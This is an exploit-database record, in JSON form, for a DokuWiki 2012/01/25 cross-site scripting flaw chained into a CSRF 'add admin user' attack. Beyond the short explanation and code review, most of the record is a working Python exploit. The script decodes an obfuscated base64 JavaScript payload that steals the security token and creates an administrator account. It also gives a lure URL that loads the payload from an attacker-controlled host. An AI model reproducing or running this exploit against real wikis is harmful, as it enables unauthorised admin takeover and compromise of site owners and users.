Description
Exploit for php platform in category web applications
{"id": "1337DAY-ID-18070", "type": "zdt", "bulletinFamily": "exploit", "title": "DocuWiki 2012/01/25 CSRF / XSS", "description": "Exploit for php platform in category web applications", "published": "2012-04-18T00:00:00", "modified": "2012-04-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/18070", "reporter": "IRCRASH", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-14T11:47:24", "viewCount": 10, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "canvas", "idList": ["NGINX"]}]}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/18070", "sourceData": "######################################################################################\r\nDokuWiki Ver.2012/01/25 ( Latest Version ) CSRF Add User Exploit\r\n######################################################################################\r\nDiscovered by : Khashayar Fereidani\r\nTeam Website : HTTP://IRCRASH.COM ( IRCRASH Security Community )\r\nFacebook : http://facebook.com/fereidani\r\nTwitter : https://twitter.com/#!/IRCRASH\r\nFacebook Page : http://www.facebook.com/pages/IRCRASH/127804297326163\r\nSoftware Developer : http://www.dokuwiki.org/\r\n######################################################################################\r\nTest System Details\r\nOS : Linux\r\nWebServer : Nginx + PHP-5.3.5\r\nWebBrowser : Firefox 10\r\n######################################################################################\r\nSubjects :\r\n1. Vulnerability Explanation\r\n2. Code Review\r\n3. Cross Site Scripting vulnerability Proof of concept\r\n4. Add User Exploit\r\n######################################################################################\r\n1. Vulnerability Explanation :\r\n\r\nVariable target in file /inc/html.php will not be checked for illegal input and\r\n function html_edit_form print $param['target'] from $param array without any filter.\r\nThis variable(target) is exploitable for Cross Site Scripting vulnerability .\r\n\r\n######################################################################################\r\n2. Code Review :\r\n\r\n# Filename : /inc/html.php\r\n** Line 1336 ( Vulnerable Variable $_REQUEST['target'] ) :\r\n$data = array('form' => $form,\r\n 'wr' => $wr,\r\n 'media_manager' => true,\r\n 'target' => (isset($_REQUEST['target']) && $wr &&\r\n $RANGE !== '') ? $_REQUEST['target'] : 'section',\r\n 'intro_locale' => $include);\r\n\r\n** Line 1436 (Vulnerable Function) :\r\nfunction html_edit_form($param) {\r\n global $TEXT;\r\n\r\n if ($param['target'] !== 'section') {\r\n msg('No editor for edit target ' . $param['target'] . ' found.', -1);\r\n }\r\n\r\n $attr = array('tabindex'=>'1');\r\n if (!$param['wr']) $attr['readonly'] = 'readonly';\r\n\r\n $param['form']->addElement(form_makeWikiText($TEXT, $attr));\r\n}\r\n######################################################################################\r\n3. Cross Site Scripting vulnerability Proof of concept :\r\nVulnerable URL : http://WEBSITE/doku.php?do=edit&id=S9F8W2A&target=[XSS]\r\nSample : http://sitename/doku.php?do=edit&id=S9F8W2A&target=<script>alert(123)</script>\r\n######################################################################################\r\n4. Add User Exploit :\r\n#EXPLOITSTART\r\n#!/usr/bin/python\r\nimport base64,string,random\r\ndef randstr(size=8, chars=string.ascii_uppercase + string.digits):\r\n return ''.join(random.choice(chars) for x in range(size))\r\nprint \"\"\"\r\n#####################################\r\n# IRCRASH Dokuwiki Add User Exploit #\r\n# Exploited By Khashayar Fereidani #\r\n# Http://ircrash.com #\r\n#####################################\r\n\"\"\"\r\nshellcode=\"\"\"\r\nZnVuY3Rpb24gTXlSZXF1ZXN0KCkgew0KaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkgew0KUmVxUmVh\r\nZGVyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KUmVxUmVhZGVyID0gbmV3IEFjdGl2\r\nZXhPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIik7DQp9DQpSZXFSZWFkZXIub25yZWFkeXN0YXRlY2hh\r\nbmdlID0gZnVuY3Rpb24gKCkgeyBUb2tlbkZpbmRlcihSZXFSZWFkZXIpOyB9DQpSZXFSZWFkZXIub3Bl\r\nbigiR0VUIiwgImRva3UucGhwIiwgdHJ1ZSk7DQpSZXFSZWFkZXIuc2VuZCgpOw0KfQ0KZnVuY3Rpb24g\r\nVG9rZW5GaW5kZXIoYSkgew0KaWYgKGEucmVhZHlTdGF0ZSA9PSA0ICYmIGEuc3RhdHVzID09IDIwMCkg\r\new0KdmFyIHNyYyA9IGEucmVzcG9uc2VUZXh0Ow0KcCA9IC92YWx1ZT0iKFswLTlhLWZdKykiLzsNCnZh\r\nciB0b2tlbiA9IHNyYy5tYXRjaChwKTsNCnBhcmFtcyA9ICJzZWN0b2s9IiArIHRva2VuWzFdICsgIiZ1\r\nc2VyaWQ9VVNFUk5BTUUmdXNlcnBhc3M9UEFTU1dPUkQmdXNlcm5hbWU9VVNFUk5BTUUmdXNlcm1haWw9\r\nYXR0QHd3d3d3d3d3Lm9zZmEmdXNlcmdyb3Vwcz1hZG1pbix1c2VyJmRvPWFkbWluJnBhZ2U9dXNlcm1h\r\nbmFnZXImc3RhcnQ9MCZmblthZGRdPUFkZCI7DQphbGVydChwYXJhbXMpOw0KRXhwbG9pdChwYXJhbXMp\r\nOw0KfQ0KfQ0KZnVuY3Rpb24gRXhwbG9pdChwYXJhbWV0ZXJzKSB7DQppZiAod2luZG93LlhNTEh0dHBS\r\nZXF1ZXN0KSB7DQpIdHRwUmVxID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KSHR0cFJl\r\ncSA9IG5ldyBBY3RpdmV4T2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpOw0KfQ0KSHR0cFJlcS5vbnJl\r\nYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbiAoKSB7DQppZiAoSHR0cFJlcS5yZWFkeVN0YXRlID09IDQg\r\nJiYgSHR0cFJlcS5zdGF0dXMgPT0gMjAwKSB7DQoNCn0NCn0NCkh0dHBSZXEub3BlbignUE9TVCcsICJk\r\nb2t1LnBocD9pZD1kb2Fka3dva2FkIiwgdHJ1ZSk7DQpIdHRwUmVxLnNldFJlcXVlc3RIZWFkZXIoIkNv\r\nbnRlbnQtdHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCkh0dHBSZXEu\r\nc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1sZW5ndGgiLCBwYXJhbWV0ZXJzLmxlbmd0aCk7DQpIdHRw\r\nUmVxLnNldFJlcXVlc3RIZWFkZXIoIkNvbm5lY3Rpb24iLCAiY2xvc2UiKTsNCkh0dHBSZXEuc2VuZChw\r\nYXJhbWV0ZXJzKTsNCn0NCk15UmVxdWVzdCgpOw0K\"\"\"\r\nshellcode=base64.b64decode(shellcode)\r\nusername=raw_input(\"[*] Enter New Username :\")\r\npassword=raw_input(\"[*] Enter Password :\")\r\nshellcode=shellcode.replace(\"USERNAME\",username).replace(\"PASSWORD\",password)\r\nlocalFile = open('my.js', 'w')\r\nlocalFile.write(shellcode)\r\nlocalFile.close()\r\nprint \"\"\"[*] A new file (my.js) added to your local folder .\r\n Upload it on your own host and send it for doku admin like this :\r\n http://WEBSITE/PATH/doku.php?do=edit&id=\"\"\" + randstr() + \"&target=<script SRC=http://YOUROWNHOST/YOURFOLDER/my.js></script>\"\r\n#EXPLOITEND\r\n######################################################################################\r\n Tnx : Just God\r\n######################################################################################\r\n\r\n\n\n# 0day.today [2018-04-14] #", "_state": {"dependencies": 1647589307, "score": 1659703426, "epss": 1678811959}}
{}
DocuWiki 2012/01/25 CSRF / XSS